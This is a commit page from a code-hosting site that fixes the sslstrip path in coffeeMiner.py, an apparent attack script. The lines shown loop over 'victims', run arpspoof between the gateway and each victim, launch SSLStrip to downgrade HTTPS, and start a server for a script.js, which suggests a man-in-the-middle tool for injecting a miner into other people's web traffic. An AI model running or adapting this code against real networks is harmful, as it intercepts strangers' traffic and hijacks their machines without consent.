Browse Source

Fixed typo on line 50

pull/5/head
Chase Taylor 7 years ago
parent
commit
bc8c52e2ed
1 changed files with 1 additions and 1 deletions
  1. +1
    -1
      coffeeMiner.py

+ 1
- 1
coffeeMiner.py

@ -41,7 +41,7 @@ for victim in victims:
os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")
# run SSLStrip on port 8000
os.system("python sslstrip.py -l 8000 &")
os.system("python sslstrip/sslstrip.py -l 8000 &")
# start the http server for serving the script.js, in a new console
os.system("xterm -hold -e 'python3 httpServer.py' &")

Loading…
Cancel
Save